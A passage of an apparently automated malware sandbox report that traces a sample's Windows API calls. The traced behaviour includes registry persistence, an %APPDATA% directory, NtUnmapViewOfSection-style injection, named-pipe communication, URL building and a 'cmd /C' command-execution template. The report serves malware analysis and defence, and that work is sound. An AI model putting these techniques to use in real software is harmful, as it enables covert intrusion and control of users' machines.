    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
